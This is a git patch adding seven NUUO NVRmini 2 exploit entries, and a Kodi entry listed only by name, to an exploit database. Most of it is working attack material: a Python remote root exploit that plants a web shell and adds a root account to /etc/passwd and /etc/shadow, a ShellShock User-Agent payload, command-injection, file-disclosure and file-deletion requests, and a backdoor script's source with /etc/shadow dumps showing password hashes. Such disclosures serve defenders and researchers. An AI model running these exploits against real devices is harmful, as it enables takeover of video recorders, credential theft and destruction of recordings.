From e16112771185c129948c8bddbf65c2751eb1c63f Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sun, 7 Aug 2016 05:06:35 +0000 Subject: [PATCH] DB: 2016-08-07 8 new exploits Kodi Web Server 16.1 - Denial of Service NUUO NVRmini 2 3.0.8 - Remote Root Exploit NUUO NVRmini 2 3.0.8 - (Add Admin) CSRF NUUO NVRmini 2 3.0.8 - Local File Disclosure NUUO NVRmini 2 3.0.8 - Multiple OS Command Injection NUUO NVRmini 2 3.0.8 - ShellShock Remote Code Execution NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion NUUO NVRmini 2 3.0.8 - (strong_user.php) Backdoor Remote Shell Access --- files.csv | 8 + platforms/cgi/webapps/40213.txt | 91 +++++++ platforms/php/webapps/40209.py | 163 +++++++++++++ platforms/php/webapps/40210.html | 66 ++++++ platforms/php/webapps/40211.txt | 154 ++++++++++++ platforms/php/webapps/40212.txt | 127 ++++++++++ platforms/php/webapps/40214.txt | 67 ++++++ platforms/php/webapps/40215.txt | 395 +++++++++++++++++++++++++++++++ platforms/windows/dos/40208.py | 54 +++++ 9 files changed, 1125 insertions(+) create mode 100755 platforms/cgi/webapps/40213.txt create mode 100755 platforms/php/webapps/40209.py create mode 100755 platforms/php/webapps/40210.html create mode 100755 platforms/php/webapps/40211.txt create mode 100755 platforms/php/webapps/40212.txt create mode 100755 platforms/php/webapps/40214.txt create mode 100755 platforms/php/webapps/40215.txt create mode 100755 platforms/windows/dos/40208.py diff --git a/files.csv b/files.csv index 2c2dab030..e34d6f354 100755 --- a/files.csv +++ b/files.csv @@ -36356,3 +36356,11 @@ id,file,description,date,author,platform,type,port 40205,platforms/cgi/webapps/40205.txt,"Davolink DV-2051 - Multiple Vulnerabilities",2016-08-05,"Eric Flokstra",cgi,webapps,80 40206,platforms/php/webapps/40206.txt,"WordPress Count per Day Plugin 3.5.4 - Stored Cross-Site Scripting",2016-08-05,"Julien Rentrop",php,webapps,80 40207,platforms/hardware/webapps/40207.txt,"NASdeluxe NDL-2400r 2.01.09 - OS Command Injection",2016-08-05,"SySS GmbH",hardware,webapps,80 +40208,platforms/windows/dos/40208.py,"Kodi Web Server 16.1 - Denial of Service",2016-08-05,"Guillaume Kaddouch",windows,dos,8080 +40209,platforms/php/webapps/40209.py,"NUUO NVRmini 2 3.0.8 - Remote Root Exploit",2016-08-06,LiquidWorm,php,webapps,80 +40210,platforms/php/webapps/40210.html,"NUUO NVRmini 2 3.0.8 - (Add Admin) CSRF",2016-08-06,LiquidWorm,php,webapps,80 +40211,platforms/php/webapps/40211.txt,"NUUO NVRmini 2 3.0.8 - Local File Disclosure",2016-08-06,LiquidWorm,php,webapps,80 +40212,platforms/php/webapps/40212.txt,"NUUO NVRmini 2 3.0.8 - Multiple OS Command Injection",2016-08-06,LiquidWorm,php,webapps,80 +40213,platforms/cgi/webapps/40213.txt,"NUUO NVRmini 2 3.0.8 - ShellShock Remote Code Execution",2016-08-06,LiquidWorm,cgi,webapps,80 +40214,platforms/php/webapps/40214.txt,"NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion",2016-08-06,LiquidWorm,php,webapps,80 +40215,platforms/php/webapps/40215.txt,"NUUO NVRmini 2 3.0.8 - (strong_user.php) Backdoor Remote Shell Access",2016-08-06,LiquidWorm,php,webapps,80 diff --git a/platforms/cgi/webapps/40213.txt b/platforms/cgi/webapps/40213.txt new file mode 100755 index 000000000..91ec6b7cb --- /dev/null +++ b/platforms/cgi/webapps/40213.txt @@ -0,0 +1,91 @@ +NUUO NVRmini 2 NE-4160 ShellShock Remote Code Execution + + +Vendor: NUUO Inc. +Product web page: http://www.nuuo.com +Affected version: Firmware Version: 02.02.00 + NVR Version: 02.02.0000.0040 + Device Pack Version: 04.07.0000.0030 + + +Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS +functionality. Setup is simple and easy, with automatic port forwarding +settings built in. NVRmini 2 supports POS integration, making this the perfect +solution for small retail chain stores. NVRmini 2 also comes full equipped as +a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping +and RAID functions for data protection. Choose NVR and know that your valuable video +data is safe, always. + +Desc: NUUO NVRmini, NVRmini2, Crystal, NVRSolo suffers from authenticated ShellShock +vulnerability. This could allow an attacker to gain control over a targeted computer +if exploited successfully. The vulnerability affects Bash, a common component known +as a shell that appears in many versions of Linux and Unix. + +Tested on: GNU/Linux 2.6.31.8 (armv5tel) + lighttpd/1.4.28 + PHP/5.5.3 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5352 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5352.php + + +14.01.2016 + +-- + + +POST /cgi-bin/cgi_system HTTP/1.1 +Host: 10.0.0.17 +Content-Length: 91 +Origin: http://10.0.0.17 +X-Requested-With: XMLHttpRequest +User-Agent: () { :;}; /bin/ls -al +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept: */* +Referer: http://10.0.0.17/protocol_ftp.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.8 +Cookie: PHPSESSID=3bc601000ea8f085c22cb37b9b102b7f; lang=en +Connection: close + +cmd=ftp_setup&act=modify&com_port=21&pasv_port_from=1024&pasv_port_to=65535&services=enable + + +Response: + +HTTP/1.1 200 OK +Connection: close +Date: Fri, 15 Jan 2016 13:09:11 GMT +Server: lighttpd/1.4.28 +Content-Length: 1652 + +drwxr-xr-x 3 root root 402 Oct 20 2014 . +drwxr-xr-x 6 root root 1024 Jan 4 22:49 .. +-rwxr-xr-x 1 root root 256564 Oct 20 2014 DaylightSavingWatcher +-rwxr-xr-x 1 root root 51376 Oct 20 2014 NuDatTool +-rwxr-xr-x 1 root root 60500 Oct 20 2014 NuDiscovery +-rwxr-xr-x 1 root root 930652 Oct 20 2014 NuHWMgn +-rwxr-xr-x 1 root root 8236 Oct 20 2014 NuNICWatcher +-rwxr-xr-x 1 root root 309 Oct 20 2014 after_mount.sh +lrwxrwxrwx 1 root root 7 Oct 20 2014 archive_mrg_mv -> lite_mv +-rwxr-xr-x 1 root root 1114844 Oct 20 2014 auto_upgrade +lrwxrwxrwx 1 root root 7 Oct 20 2014 cgi_main -> lite_mv +-rwxr-xr-x 1 root root 576992 Oct 20 2014 cgi_system +lrwxrwxrwx 1 root root 7 Oct 20 2014 ddns_update -> lite_mv +-rwxr-xr-x 1 root root 570 Oct 20 2014 getdhcpip.sh +-rwxr-xr-x 1 root root 388 Oct 20 2014 halt +drwxr-xr-x 2 root root 41 Oct 20 2014 lib +-rwxr-xr-x 1 root root 3827188 Oct 20 2014 lite_mv +-rwxr-xr-x 1 root root 15396 Oct 20 2014 nagent_mv +-rwxr-xr-x 1 root root 9836 Oct 20 2014 nu_btns +-rwxr-xr-x 1 root root 3496 Oct 20 2014 nudaemon +-rwxr-xr-x 1 root root 10616 Oct 20 2014 nufancontrol +-rwxr-xr-x 1 root root 12772 Oct 20 2014 nuklogd +-rwxr-xr-x 1 root root 392 Oct 20 2014 reboot +-rwxr-xr-x 1 root root 13144 Oct 20 2014 thwstat +FTP Setup OK diff --git a/platforms/php/webapps/40209.py b/platforms/php/webapps/40209.py new file mode 100755 index 000000000..34548f41c --- /dev/null +++ b/platforms/php/webapps/40209.py @@ -0,0 +1,163 @@ +#!/usr/bin/env python +# +# +# NUUO Remote Root Exploit +# +# +# Vendor: NUUO Inc. +# Product web page: http://www.nuuo.com +# Affected version: <=3.0.8 +# +# Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS +# functionality. Setup is simple and easy, with automatic port forwarding +# settings built in. NVRmini 2 supports POS integration, making this the perfect +# solution for small retail chain stores. NVRmini 2 also comes full equipped as +# a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping +# and RAID functions for data protection. Choose NVR and know that your valuable video +# data is safe, always. +# +# Desc: NUUO NVRmini, NVRmini2, Crystal and NVRSolo suffers from an unauthenticated command +# injection vulnerability. Due to an undocumented and hidden debugging script, an attacker +# can inject and execute arbitrary code as the root user via the 'log' GET parameter in the +# '__debugging_center_utils___.php' script. +# +# ----------------------------------------------------- +# $ nuuo.py 10.0.0.17 80 +# [*] ============================================== +# [*] NUUO NVR/DVR/NDVR Remote Root Exploit +# [*] Zero Science Lab - http://www.zeroscience.mk +# [*] ============================================== +# [*] Backdoor detected! +# [*] Add root user (y/n)? n +# [*] Press [ ENTER ] to start root shell... +# +# root@nuuo:~# id +# uid=0(root) gid=0(root) +# +# root@nuuo:~# exit +# +# [*] Removing raidh.php file +# [*] Session terminated! +# +# $ +# ----------------------------------------------------- +# +# Tested on: GNU/Linux 3.0.8 (armv7l) +# GNU/Linux 2.6.31.8 (armv5tel) +# lighttpd/1.4.28 +# PHP/5.5.3 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# Zero Science Lab - http://www.zeroscience.mk +# +# +# Advisory ID: ZSL-2016-5348 +# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5348.php +# NSE Script: http://www.zeroscience.mk/codes/nuuo-backdoor.nse +# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40209.zip +# +# +# 14.01.2016 +# + +import os###### +import sys##### +import time#### +import urllib## +import binascii +import requests + +__author__ = 'lqwrm' + +def persist(host,port,hexy,clean): + + pwd = '''echo 'roOt:x:0:0:PWNED account:/:/bin/bash' >> /etc/passwd''' + sdw = '''echo 'roOt:$1$MJOnV/Y3$tDnMIBMy0lEQ2kDpfgTJP0:16914:0:99999:7:::' >> /etc/shadow''' + print '[*] Adding user \'roOt\' with password \'rewt\' in passwd file.' + requests.get('http://'+host+':'+port+'/raidh.php?cmd='+pwd) + time.sleep(2) + + print '[*] Updating shadow file.' + requests.get('http://'+host+':'+port+'/raidh.php?cmd='+sdw) + time.sleep(2) + + print '[*] Shell awaits: ssh roOt@'+host + requests.get('http://'+host+':'+port+'/raidh.php?cmd='+urllib.quote(clean)) + exit(0) + +def check(host,port,hexy): + + try: + r = requests.get('http://'+host+':'+port+'/'+hexy, allow_redirects=False) + if r.status_code == 200: + print '[*] Backdoor detected!' + pass + else: + print '[*] No backdoors here. :(' + exit(0) + except Exception: + print '[*] Could not connect.' + exit(0) + +def main(): + + print '[*] ==============================================' + print '[*] NUUO NVR/DVR/NDVR Remote Root Exploit' + print '[*] Zero Science Lab - http://www.zeroscience.mk' + print '[*] ==============================================' + + if (len(sys.argv) <= 2): + print '[*] Usage: nuuo.py ' + exit(0) + + host = sys.argv[1] + port = sys.argv[2] + + dbgcu = '5f5f64'# + dbgcu+= '656275'# + dbgcu+= '676769'# + dbgcu+= '6e675f'# + dbgcu+= '63656e'# + dbgcu+= '746572'# + dbgcu+= '5f7574'# + dbgcu+= '696c73'# + dbgcu+= '5f5f5f'# + dbgcu+= '2e7068'# + dbgcu+= '70'###'# + + hexy = binascii.unhexlify(dbgcu) + check (host,port,hexy) + + payload = '''echo "" > raidh.php''' + requests.get('http://'+host+':'+port+'/'+hexy+'?log=1337;' + payload) + + clean = 'rm raidh.php' + a1 = raw_input('[*] Add root user (y/n)? ') + if a1.strip() == 'y' or a1.strip() == 'Y': + persist (host,port,hexy,clean) + else: + pass + + print '[*] Press [ ENTER ] to start root shell...' + raw_input() + + while True: + try: + cmd = raw_input('root@nuuo:~# ') + if cmd.strip() == '': + print '[*] Give me a command!\n' + continue + else: + e = requests.get('http://'+host+':'+port+'/raidh.php?cmd='+urllib.quote(cmd)) + print e.text + if cmd.strip() == 'exit': + print '[*] Removing raidh.php file' + requests.get('http://'+host+':'+port+'/raidh.php?cmd='+urllib.quote(clean)) + print '[*] Session terminated!' + break + except Exception: + break + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/platforms/php/webapps/40210.html b/platforms/php/webapps/40210.html new file mode 100755 index 000000000..f5c8d28f0 --- /dev/null +++ b/platforms/php/webapps/40210.html @@ -0,0 +1,66 @@ + + + + + + +
+ + + + + + + + + + + + + + + + + +
+ + diff --git a/platforms/php/webapps/40211.txt b/platforms/php/webapps/40211.txt new file mode 100755 index 000000000..c22e0c497 --- /dev/null +++ b/platforms/php/webapps/40211.txt @@ -0,0 +1,154 @@ +NUUO Local File Disclosure Vulnerability + + +Vendor: NUUO Inc. +Product web page: http://www.nuuo.com +Affected version: <=3.0.8 (NE-4160, NT-4040) + +Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS +functionality. Setup is simple and easy, with automatic port forwarding +settings built in. NVRmini 2 supports POS integration, making this the perfect +solution for small retail chain stores. NVRmini 2 also comes full equipped as +a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping +and RAID functions for data protection. Choose NVR and know that your valuable video +data is safe, always. + +Desc: NUUO NVRmini, NVRmini2, Crystal and NVRSolo suffers from a file disclosure +vulnerability when input passed thru the 'css' parameter to 'css_parser.php' script +is not properly verified before being used to include files. This can be exploited +to disclose contents of files from local resources. + + +Tested on: GNU/Linux 3.0.8 (armv7l) + GNU/Linux 2.6.31.8 (armv5tel) + lighttpd/1.4.28 + PHP/5.5.3 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5350 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5350.php + + +14.01.2016 + +-- + + +Request: +-------- +GET http://10.0.0.17/css_parser.php?css=__nvr_dat_tool___.php HTTP/1.1 + + +Response: +--------- + + + + + + DatTool + + +'; + echo 'alert("The system will start to repair videos right after system reboot. Please go to Setting Page to reboot system manually.")'; + echo ''; + touch(constant("FLASH_FOLDER")."/checkdat"); + } +?> + +

Click the Repair button to repair the recorded videos became black due to incorrect video format. It may take a long time to repair videos, which depends on the amount of video files.

+
+ + + + +
+ + +
+Usermame:
+Password:
+ +
+ + + + + + +============================================================================ + +Request: +-------- + +GET http://10.0.0.17/css_parser.php?css=css_parser.php HTTP/1.1 + + +Response: +--------- + +$value) +{ + //echo "Key: $key; Value: $value
\n "; + if ($key != 'css') + { + $file = str_replace($key,$value,$file); + } + //system("echo \"Key: $key; Value: $value
\n \" >> $filename"); +} + +echo $file; + +/* +foreach(array_reverse($matches[0]) as $match){ + $match=preg_replace('/\s+/',' ',rtrim(ltrim($match))); + $names[]=preg_replace('/\s.*//*','',$match); + $values[]=preg_replace('/^[^\s]*\s/','',$match); +} +*/ + +?> diff --git a/platforms/php/webapps/40212.txt b/platforms/php/webapps/40212.txt new file mode 100755 index 000000000..0d6de9fcb --- /dev/null +++ b/platforms/php/webapps/40212.txt @@ -0,0 +1,127 @@ +NUUO Multiple OS Command Injection Vulnerabilities + + +Vendor: NUUO Inc. +Product web page: http://www.nuuo.com +Affected version: <=3.0.8 (NE-4160, NT-4040, NT-4040(R)) + DP: <=04.07.0000.0030, <=04.03.0000.0035 + FW: <=02.02.00, <=1.7.0 + +Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS +functionality. Setup is simple and easy, with automatic port forwarding +settings built in. NVRmini 2 supports POS integration, making this the perfect +solution for small retail chain stores. NVRmini 2 also comes full equipped as +a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping +and RAID functions for data protection. Choose NVR and know that your valuable video +data is safe, always. + +NUUO Titan NVR is NUUO's Linux-based open platform recording solution. It is built +on Linux Foundation, with cross-platform Windows and MAC client software. It supports +up to 64 channels of megapixel recording with 250 Mbps throughput. It also comes with +a myriads of features that will sure to fulfill even the most demanding projects. Supports +over 2300 camera models from over 100 vendors. + +Desc: NUUO NVRmini, NVRmini2, Crystal, NVRSolo and NVRTitan suffers from multiple +authenticated OS command injection vulnerabilities. This can be exploited to inject +and execute arbitrary shell commands as the root user. + +Tested on: GNU/Linux 3.0.8 (armv7l) + GNU/Linux 2.6.31.8 (armv5tel) + lighttpd/1.4.28 + lighttpd/1.4.35 + PHP/5.5.3 + PHP/5.6.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5351 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5351.php + + +14.01.2016 + +-- + + +NVRTitan: + +POST /handle_iscsi.php HTTP/1.1 +Host: 10.0.0.17 +Content-Length: x +Origin: http://10.0.0.17 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept: */* +Referer: http://10.0.0.17/iscsi.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.8 +Cookie: PHPSESSID=c9fdced9e8129eb4c14e3154cd0e0ce3; lang=en; loginName=admin +Connection: close + +act=discover&address=1.1.1.1|echo%20pwn&port=3260 + + + + +HTTP/1.1 200 OK +X-Powered-By: PHP/5.6.0 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-type: text/html; charset=UTF-8 +Connection: close +Date: Mon, 18 Apr 2016 08:52:17 GMT +Server: lighttpd/1.4.35 +Content-Length: x + +pwn + + +============================================================ + + +NVRmini/2/Solo/Crystal: + +GET /cgi-bin/cgi_system?cmd=raid_setup&act=getsmartinfo&devname=|ping%20-n%200%20localhost&rand=1452765315144 HTTP/1.1 +Host: 10.0.0.17 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36 +X-Requested-With: XMLHttpRequest +Accept: */* +Referer: http://10.0.0.17/raid.php +Accept-Encoding: gzip, deflate, sdch +Accept-Language: en-US,en;q=0.8 +Cookie: PHPSESSID=3bc601000ea8f085c22cb37b9b102b7f; lang=en +Connection: close + +--- + +POST /cgi-bin/cgi_system?cmd=saveconfig HTTP/1.1 +Host: 10.0.0.17 +Content-Length: 97 +Cache-Control: max-age=0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Origin: http://10.0.0.17 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Referer: http://10.0.0.17/save_config.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.8 +Cookie: PHPSESSID=3bc601000ea8f085c22cb37b9b102b7f; lang=en +Connection: close + +bfolder=%2Fmtd%2Fblock3&bfile=|ping%20-n%200%20localhost&inc_emap=no&inc_pos=no + + +--- + +Sample session from commix: + +Shell > whoami +root +Shell > ls +Default.ini EMap PatrolOpt003.xml PatrolOpt009.xml PatrolOpt015.xml access apcupsd authority.lic auto_upgrade.ini autoarchive.ini camera.ini cameraparam.ini cmsserver.ini cmsstat daylightsaving.ini ddns.ini dualstreaming.ini email.ini eventaction.ini ezNUUO iobox.ini lenssetting.ini lighttpd-inc.conf lighttpd.conf liveserver.ini notice.ini nuservice.conf pos proftpd-inc.conf pushnotification raid_info.xml recordingmode.ini schedule.ini scheduler_dio.ini scheduler_motion.ini smb-inc.conf version.xml diff --git a/platforms/php/webapps/40214.txt b/platforms/php/webapps/40214.txt new file mode 100755 index 000000000..b3a24a9d8 --- /dev/null +++ b/platforms/php/webapps/40214.txt @@ -0,0 +1,67 @@ + +NUUO Arbitrary File Deletion Vulnerability + + +Vendor: NUUO Inc. +Product web page: http://www.nuuo.com +Affected version: <=3.0.8 + +Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS +functionality. Setup is simple and easy, with automatic port forwarding +settings built in. NVRmini 2 supports POS integration, making this the perfect +solution for small retail chain stores. NVRmini 2 also comes full equipped as +a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping +and RAID functions for data protection. Choose NVR and know that your valuable video +data is safe, always. + +Desc: Input passed to the 'filename' parameter in 'deletefile.php' is not properly +sanitised before being used to delete files. This can be exploited to delete files +with the permissions of the web server using their absolute path or via directory +traversal sequences passed within the affected POST/GET parameter. + +================================================================== +/deletefile.php: +---------------- + +1: + +================================================================== + +Tested on: GNU/Linux 3.0.8 (armv7l) + GNU/Linux 2.6.31.8 (armv5tel) + lighttpd/1.4.28 + PHP/5.5.3 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5353 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5353.php + + +14.01.2016 + +-- + + +POST /deletefile.php HTTP/1.1 +Host: 10.0.0.17 +Content-Length: x +Origin: http://10.0.0.17 +X-Requested-With: XMLHttpRequest +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.8 +Connection: close + +filename=He_molested_murdered_and_mutilated_her.mp4 + diff --git a/platforms/php/webapps/40215.txt b/platforms/php/webapps/40215.txt new file mode 100755 index 000000000..cec5886ea --- /dev/null +++ b/platforms/php/webapps/40215.txt @@ -0,0 +1,395 @@ + +NUUO Backdoor (strong_user.php) Remote Shell Access + + +Vendor: NUUO Inc. +Product web page: http://www.nuuo.com +Affected version: <=3.0.8 (NE-4160, NT-4040) + +Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS +functionality. Setup is simple and easy, with automatic port forwarding +settings built in. NVRmini 2 supports POS integration, making this the perfect +solution for small retail chain stores. NVRmini 2 also comes full equipped as +a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping +and RAID functions for data protection. Choose NVR and know that your valuable video +data is safe, always. + +Desc: NUUO NVRmini, NVRmini2, Crystal and NVRSolo devices have a hidden PHP script +that when called, a backdoor user is created with poweruser privileges that is able +to read and write files on the affected device. The backdoor user 'bbb' when created +with the password '111111' by visiting 'strong_user.php' script is able to initiate a +secure shell session and further steal and/or destroy sensitive information. + +================================================================== +/strong_user.php: +------------------------------- + +fileData = file($file); + $this->file = $file; + } + else + { + throw new Exception("Couldn’t open file."); + } + } catch (Exception $e) { + $this->error[] = $e->getMessage(); + } + } + + public function getAllHTML(){ + foreach ($this->fileData as $content) + { + $temp = explode(':', $content); + $output .= "Username: {$temp[0]}
"; + $output .= "Validation: {$temp[1]}
"; + $output .= "User Identifier: {$temp[2]}
"; + $output .= "Group Identifier: {$temp[3]}
"; + $output .= "Gecos Field: {$temp[4]}
"; + $output .= "Home Directory: {$temp[5]}
"; + $output .= "Shell: {$temp[6]}
"; + $output .= "
"; + } + return $output; + } + + public function getAllCLI() { + foreach ($this->fileData as $content) + { + $temp = explode(':', $content); + $output .= "Username: {$temp[0]} n"; + $output .= "Validation: {$temp[1]} n"; + $output .= "User Identifier: {$temp[2]} n"; + $output .= "Group Identifier: {$temp[3]} n"; + $output .= "Gecos Field: {$temp[4]} n"; + $output .= "Home Directory: {$temp[5]} n"; + $output .= "Shell: {$temp[6]} n"; + $output .= "n"; + } + return $output; + } + + public function searchUser($user,$data=0) { + try{ + $data = array(); + if (is_string($user)) + { + foreach($this->fileData as $line) + { + $temp = explode(':', $line); + if (in_array($user,$temp)) + { + if ($data) return 1; + $data['username'] = $temp[0]; + $data['validation'] = $temp[1]; + $data['user_identifier'] = $temp[2]; + $data['group_identifier'] = $temp[3]; + $data['gecos'] = $temp[4]; + $data['home_directory'] = $temp[5]; + $data['shell'] = $temp[6]; + } + + } + } + else + { + throw new Exception('A search error has occured.'); + } + } catch (Exception $e) { + $this->error[] = $e->getMessage(); + } + return $data; + } + + public function getError() { + return $this->error; + } + + public function deleteUser($user) { + try{ + if ($this->searchUser($user,1)) + { + foreach ($this->fileData as $line) + { + $lines = explode(":",$line); + if (!in_array($user,$lines)) + { + $final .= $line; + } + } + if(!file_put_contents($this->file,$final)) + { + throw new Exception("Could not delete user."); + } + } + else + { + throw new Exception("User doesn’t exist."); + } + } catch (Exception $e) { + echo $this->error[] = $e->getMessage(); + } + } +} + + + + + + + + + +/* + + echo "Strong test "; + + ma_getuser(); + ma_getgroup(); + + $result = array('users' => array(), 'groups' => array()); + + echo "
"; + echo $maUser; + echo "
"; + echo $maGroup; + echo "
"; + + foreach($maGroup as $key =>$value) + { + $tmp = array(); + $tmp['groupname'] = $maGroup[$key]->strGroupname; + $tmp['members'] = array(); + echo "Group (" . $key . ") === " . $maGroup[$key]->strGroupname; + echo "

"; + ma_getgroupmember($maGroup[$key]->strGroupname); + foreach ($maGroupmember as $mKey => $mValue) + { + echo " User ($mKey) ===> $mValue "; + echo "
"; + array_push($tmp['members'], $maGroupmember[$mKey]->strUsername); + } + //foreach($value as $userkey => $uservalue) + //{ + // echo " User ($userkey) ===> $uservalue "; + // echo "
"; + //} + echo "
"; + echo implode(",", $tmp['members']); + echo "
"; + $tmp['membersStr'] = implode(",", $tmp['members']); + array_push($result['groups'], $tmp); + } + + + echo "

Other

"; + $tmp = array(); + $tmp['groupname'] = 'admin'; + ma_getgroupmember($tmp['groupname']); + //ma_getgroupmember(''); + $tmp['members'] = array(); + foreach ($maGroupmember as $mKey => $mValue) + { + array_push($tmp['members'], $maGroupmember[$mKey]->strUsername); + echo $maGroupmember[$mKey]->strUsername . "
"; + } + $tmp['membersStr'] = implode(",", $tmp['members']); + array_push($result['groups'], $tmp); + + + echo "

USER

"; + + foreach ( $maUser as $key => $value) + { + $tmp = array(); + $tmp['username'] = $maUser[$key]->strUsername; + $tmp['groups'] = array(); + foreach ($result['groups'] as $gKey => $gValue) + { + if (in_array($tmp['username'], $gValue['members'])) + array_push($tmp['groups'], $gValue['groupname']); + } + $tmp['groupsStr'] = implode(",", $tmp['groups']); + echo $tmp['username'] . "
"; + echo $tmp['groupsStr'] . "
"; + array_push($result['users'], $tmp); + } +*/ + + echo "

Read Passwd

"; + + $passclass = new ReadPasswd('/etc/passwd'); + echo $passclass->getAllHTML(); + + echo "

add user

"; + //$output = system("adduser bbb -G poweruser -s /sbin/nologin -D -H; passwd bbb 111111"); + //$output = system("adduser bbb -G poweruser -s /sbin/nologin -D -H"); + $output = system("adduser bbb -G poweruser -D "); + + +/* + + $f = popen ("/usr/bin/passwd bbb","r"); + $read = fread($f, 1024); + $out = fwrite($f,"111111\n"); + echo $read . " read 111 ,,, $out
"; + $read = fread($f, 1024); + $out = fwrite($f,"111111\n"); + echo $read . " read 222 ,,, $out
"; + pclose($f); + //echo $output . " kkk
"; +*/ + $descriptorspec = array( + 0 => array("pipe", "r"), // stdin is a pipe that the child will read from + 1 => array("pipe", "w") // stdout is a pipe that the child will write to + ); + + $process = proc_open('/usr/bin/passwd bbb', $descriptorspec, $pipes); + if (is_resource($process)) + { + $read = fread($pipes[1], 1024); + $out = fwrite($pipes[0],"111111\n"); + echo $read . " read 111 ,,, $out
"; + $read = fread($pipes[1], 1024); + $out = fwrite($pipes[0],"111111\n"); + echo $read . " read 111 ,,, $out
"; + + fclose($pipes[0]); + fclose($pipes[1]); + } + proc_close($process); + + + + //$handle = popen("/bin/ls", "r"); + //$read = fread($handle, 1024); + //echo $read; + //pclose($handle); + +?> + +================================================================== + +Tested on: GNU/Linux 3.0.8 (armv7l) + GNU/Linux 2.6.31.8 (armv5tel) + lighttpd/1.4.28 + PHP/5.5.3 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5354 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5354.php + + +14.01.2016 + +-- + + +#1 +Read of /etc/shadow file before backdoor was enabled: +------------------------------------------------------ + +root@nuuo:~# cat /etc/shadow +#root:$1$1b0pmacH$sP7VdEAv01TvOk1JSl2L6/:14495:0:99999:7::: +root:$1$vd3TecoS$VyBh4/IsumZkqFU.1wfrV.:14461:0:99999:7::: +bin:*:14495:0:99999:7::: +daemon:*:14495:0:99999:7::: +adm:*:14495:0:99999:7::: +lp:*:14495:0:99999:7::: +sync:*:14495:0:99999:7::: +shutdown:*:14495:0:99999:7::: +halt:*:14495:0:99999:7::: +mail:*:14495:0:99999:7::: +uucp:*:14495:0:99999:7::: +operator:*:14495:0:99999:7::: +games:*:14495:0:99999:7::: +gopher:*:14495:0:99999:7::: +ftp:*:14495:0:99999:7::: +nobody:*:14495:0:99999:7::: +vcsa:!!:14564:::::: +sshd:!!:14564:::::: +guest::14564:0:99999:7::: + + +#2 +Issuing GET request to the script: +----------------------------------- + +GET http://10.0.0.17/strong_user.php HTTP/1.1 + + +#3 +Read of /etc/shadow file after backdoor was enabled: +----------------------------------------------------- + +root@nuuo:~# cat /etc/shadow +#root:$1$1b0pmacH$sP7VdEAv01TvOk1JSl2L6/:14495:0:99999:7::: +root:$1$vd3TecoS$VyBh4/IsumZkqFU.1wfrV.:14461:0:99999:7::: +bin:*:14495:0:99999:7::: +daemon:*:14495:0:99999:7::: +adm:*:14495:0:99999:7::: +lp:*:14495:0:99999:7::: +sync:*:14495:0:99999:7::: +shutdown:*:14495:0:99999:7::: +halt:*:14495:0:99999:7::: +mail:*:14495:0:99999:7::: +uucp:*:14495:0:99999:7::: +operator:*:14495:0:99999:7::: +games:*:14495:0:99999:7::: +gopher:*:14495:0:99999:7::: +ftp:*:14495:0:99999:7::: +nobody:*:14495:0:99999:7::: +vcsa:!!:14564:::::: +sshd:!!:14564:::::: +guest::14564:0:99999:7::: +bbb:$1$gYfUNAQN$.sn8WpIO5gNoOQeZzSyBI/:16915:0:99999:7::: + + +#4 +The backdoor account is able to read the /etc/shadow file: +----------------------------------------------------------- + +login as: bbb +bbb@10.0.0.17's password: +-sh-3.2$ id +Using fallback suid method +uid=1004(bbb) gid=1000(poweruser) groups=1000(poweruser) 